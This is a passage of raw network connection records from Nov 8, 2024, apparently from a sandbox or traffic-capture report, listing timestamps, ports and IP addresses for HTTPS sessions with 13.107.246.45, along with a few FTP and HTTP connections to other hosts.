Nov 8, 2024 16:15:45.359042883 CET	49842	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.359047890 CET	443	49842	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.360945940 CET	49849	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.360986948 CET	443	49849	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.361046076 CET	49849	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.361161947 CET	49849	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.361176968 CET	443	49849	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.421041012 CET	21	49833	50.31.176.103	192.168.2.10
Nov 8, 2024 16:15:45.470662117 CET	49833	21	192.168.2.10	50.31.176.103
Nov 8, 2024 16:15:45.956902981 CET	443	49845	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.957452059 CET	49845	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.957473040 CET	443	49845	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:45.957998037 CET	49845	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:45.958007097 CET	443	49845	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.011282921 CET	443	49846	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.012094021 CET	49846	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.012130976 CET	443	49846	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.012590885 CET	49846	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.012598038 CET	443	49846	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.028599977 CET	443	49847	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.029090881 CET	49847	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.029108047 CET	443	49847	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.029613972 CET	49847	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.029618025 CET	443	49847	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.086683035 CET	443	49845	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.086922884 CET	443	49845	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.086987972 CET	49845	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.087038040 CET	49845	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.087052107 CET	443	49845	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.087063074 CET	49845	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.087069035 CET	443	49845	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.089807987 CET	49850	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.089870930 CET	443	49850	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.089945078 CET	49850	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.090104103 CET	49850	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.090117931 CET	443	49850	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.112551928 CET	443	49849	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.113035917 CET	49849	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.113050938 CET	443	49849	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.113451004 CET	443	49848	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.113794088 CET	49849	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.113801003 CET	443	49849	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.114094973 CET	49848	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.114115000 CET	443	49848	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.114573956 CET	49848	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.114583969 CET	443	49848	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.142627954 CET	443	49846	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.142673016 CET	443	49846	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.142713070 CET	443	49846	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.142765045 CET	49846	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.142796993 CET	49846	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.142977953 CET	49846	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.143002033 CET	443	49846	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.143021107 CET	49846	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.143027067 CET	443	49846	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.145776987 CET	49851	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.145804882 CET	443	49851	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.145889044 CET	49851	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.146039963 CET	49851	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.146053076 CET	443	49851	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.158266068 CET	443	49847	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.160244942 CET	443	49847	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.160331964 CET	49847	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.160356998 CET	49847	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.160367012 CET	443	49847	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.160382986 CET	49847	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.160387993 CET	443	49847	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.162811995 CET	49852	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.162859917 CET	443	49852	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.162934065 CET	49852	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.163037062 CET	49852	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.163049936 CET	443	49852	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.243418932 CET	443	49849	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.243527889 CET	443	49849	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.243602991 CET	49849	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.243757010 CET	49849	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.243782997 CET	443	49849	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.243794918 CET	49849	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.243803024 CET	443	49849	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.244513988 CET	443	49848	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.244883060 CET	443	49848	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.244934082 CET	443	49848	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.244936943 CET	49848	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.244982004 CET	49848	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.245008945 CET	49848	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.245031118 CET	443	49848	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.245045900 CET	49848	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.245052099 CET	443	49848	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.247504950 CET	49853	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.247544050 CET	443	49853	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.247616053 CET	49853	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.248578072 CET	49854	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.248620033 CET	443	49854	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.248676062 CET	49854	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.249229908 CET	49853	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.249243021 CET	443	49853	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.249320984 CET	49854	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.249341011 CET	443	49854	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.824980974 CET	443	49850	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.825468063 CET	49850	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.825501919 CET	443	49850	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.825931072 CET	49850	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.825943947 CET	443	49850	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.928307056 CET	443	49852	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.928874016 CET	49852	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.928890944 CET	443	49852	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.929327965 CET	49852	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.929333925 CET	443	49852	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.953936100 CET	443	49850	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.954049110 CET	443	49850	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.954138994 CET	49850	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.954374075 CET	49850	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.954402924 CET	443	49850	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.954418898 CET	49850	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.954427004 CET	443	49850	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.957252979 CET	49855	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.957299948 CET	443	49855	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.957381010 CET	49855	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.957519054 CET	49855	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.957536936 CET	443	49855	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.987674952 CET	443	49853	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.988152981 CET	49853	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.988167048 CET	443	49853	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.988651037 CET	49853	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.988656998 CET	443	49853	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.990315914 CET	443	49854	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.990752935 CET	49854	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.990766048 CET	443	49854	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:46.991211891 CET	49854	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:46.991216898 CET	443	49854	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.014538050 CET	443	49851	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.015038967 CET	49851	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.015067101 CET	443	49851	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.015465021 CET	49851	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.015477896 CET	443	49851	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.065399885 CET	443	49852	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.065448999 CET	443	49852	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.065501928 CET	443	49852	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.065561056 CET	49852	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.065957069 CET	49852	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.065957069 CET	49852	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.065985918 CET	49852	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.066000938 CET	443	49852	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.068974018 CET	49856	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.068984032 CET	443	49856	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.069041967 CET	49856	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.069199085 CET	49856	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.069207907 CET	443	49856	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.116481066 CET	443	49853	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.116550922 CET	443	49853	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.116640091 CET	49853	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.116764069 CET	49853	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.116782904 CET	443	49853	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.116799116 CET	49853	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.116805077 CET	443	49853	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.119879961 CET	49857	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.119924068 CET	443	49857	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.119987965 CET	49857	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.120165110 CET	49857	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.120176077 CET	443	49857	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.120476961 CET	443	49854	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.120559931 CET	443	49854	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.120599985 CET	49854	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.120707035 CET	49854	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.120716095 CET	443	49854	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.120728016 CET	49854	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.120732069 CET	443	49854	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.123347044 CET	49858	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.123375893 CET	443	49858	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.123455048 CET	49858	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.123577118 CET	49858	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.123584986 CET	443	49858	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.128106117 CET	49859	21	192.168.2.10	50.31.176.103
Nov 8, 2024 16:15:47.128155947 CET	49816	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:47.132983923 CET	21	49859	50.31.176.103	192.168.2.10
Nov 8, 2024 16:15:47.133212090 CET	49859	21	192.168.2.10	50.31.176.103
Nov 8, 2024 16:15:47.133493900 CET	80	49816	158.101.44.242	192.168.2.10
Nov 8, 2024 16:15:47.133560896 CET	49816	80	192.168.2.10	158.101.44.242
Nov 8, 2024 16:15:47.137236118 CET	49859	21	192.168.2.10	50.31.176.103
Nov 8, 2024 16:15:47.142169952 CET	21	49859	50.31.176.103	192.168.2.10
Nov 8, 2024 16:15:47.142324924 CET	21	49859	50.31.176.103	192.168.2.10
Nov 8, 2024 16:15:47.142393112 CET	49859	21	192.168.2.10	50.31.176.103
Nov 8, 2024 16:15:47.144846916 CET	443	49851	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.145049095 CET	443	49851	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.145121098 CET	49851	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.145185947 CET	49851	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.145203114 CET	443	49851	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.145215988 CET	49851	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.145221949 CET	443	49851	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.148004055 CET	49860	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.148025036 CET	443	49860	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.148097992 CET	49860	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.148258924 CET	49860	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.148272991 CET	443	49860	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.698990107 CET	443	49855	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.699690104 CET	49855	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.699712992 CET	443	49855	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.700105906 CET	49855	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.700109959 CET	443	49855	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.817612886 CET	443	49856	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.818367958 CET	49856	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.818381071 CET	443	49856	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.818834066 CET	49856	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.818839073 CET	443	49856	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.831464052 CET	443	49855	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.831547022 CET	443	49855	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.831626892 CET	49855	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.831868887 CET	49855	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.831868887 CET	49855	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.831886053 CET	443	49855	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.831898928 CET	443	49855	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.834839106 CET	49861	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.834896088 CET	443	49861	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.834986925 CET	49861	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.835185051 CET	49861	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.835199118 CET	443	49861	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.888716936 CET	443	49857	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.889630079 CET	49857	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.889651060 CET	443	49857	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.890093088 CET	49857	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.890101910 CET	443	49857	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.890330076 CET	443	49858	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.890674114 CET	49858	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.890696049 CET	443	49858	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.890984058 CET	49858	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.890990019 CET	443	49858	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.894527912 CET	443	49860	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.894867897 CET	49860	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.894890070 CET	443	49860	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.895205975 CET	49860	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.895212889 CET	443	49860	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.951278925 CET	443	49856	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.951325893 CET	443	49856	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.951384068 CET	443	49856	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.951453924 CET	49856	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.951508999 CET	49856	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.951773882 CET	49856	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.951773882 CET	49856	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.951786041 CET	443	49856	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.951795101 CET	443	49856	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.955024004 CET	49862	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.955070972 CET	443	49862	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:47.955152035 CET	49862	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.955352068 CET	49862	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:47.955368042 CET	443	49862	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.022320032 CET	443	49858	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.022449970 CET	443	49857	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.022524118 CET	443	49857	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.022576094 CET	49857	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.022741079 CET	49857	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.022762060 CET	443	49857	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.022775888 CET	49857	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.022782087 CET	443	49857	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.022886992 CET	443	49858	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.022936106 CET	49858	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.024036884 CET	49858	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.024036884 CET	49858	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.024054050 CET	443	49858	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.024064064 CET	443	49858	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.026916981 CET	49863	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.026961088 CET	443	49863	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.027034998 CET	49863	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.027055979 CET	49864	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.027092934 CET	443	49864	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.027142048 CET	49864	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.027256966 CET	49863	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.027271032 CET	443	49863	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.027403116 CET	49864	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.027415037 CET	443	49864	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.028122902 CET	443	49860	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.028202057 CET	443	49860	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.028295994 CET	49860	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.028388977 CET	49860	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.028407097 CET	443	49860	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.028424025 CET	49860	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.028429031 CET	443	49860	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.030610085 CET	49865	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.030649900 CET	443	49865	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.030734062 CET	49865	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.030853987 CET	49865	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.030869007 CET	443	49865	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.576014996 CET	443	49861	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.578636885 CET	49861	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.578663111 CET	443	49861	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.579122066 CET	49861	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.579127073 CET	443	49861	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.708838940 CET	443	49861	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.708870888 CET	443	49861	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.708923101 CET	443	49861	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.708950043 CET	49861	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.708988905 CET	49861	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.709212065 CET	49861	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.709237099 CET	443	49861	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.709249973 CET	49861	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.709256887 CET	443	49861	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.712054968 CET	49866	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.712104082 CET	443	49866	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.712218046 CET	49866	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.712388039 CET	49866	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.712403059 CET	443	49866	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.754539013 CET	443	49865	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.755105019 CET	49865	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.755136967 CET	443	49865	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.755580902 CET	49865	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.755589008 CET	443	49865	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.760997057 CET	443	49863	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.761425972 CET	49863	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.761459112 CET	443	49863	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.761862040 CET	49863	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.761876106 CET	443	49863	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.766053915 CET	443	49864	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.766506910 CET	49864	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.766535997 CET	443	49864	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.766938925 CET	49864	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.766947985 CET	443	49864	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.881614923 CET	443	49862	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.882220030 CET	49862	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.882245064 CET	443	49862	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.882697105 CET	49862	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.882704973 CET	443	49862	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.892668962 CET	443	49863	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.893110991 CET	443	49863	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.893179893 CET	49863	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.893218994 CET	49863	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.893244028 CET	49863	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.893244028 CET	443	49863	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.893253088 CET	443	49863	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.895163059 CET	443	49865	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.895200968 CET	443	49865	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.895242929 CET	443	49865	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.895270109 CET	49865	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.895304918 CET	49865	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.895493031 CET	49865	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.895510912 CET	443	49865	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.895524025 CET	49865	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.895529985 CET	443	49865	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.896090984 CET	49867	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.896120071 CET	443	49867	13.107.246.45	192.168.2.10
Nov 8, 2024 16:15:48.896179914 CET	49867	443	192.168.2.10	13.107.246.45
Nov 8, 2024 16:15:48.896373034 CET	49867	443	192.168.2.10	13.107.246.45
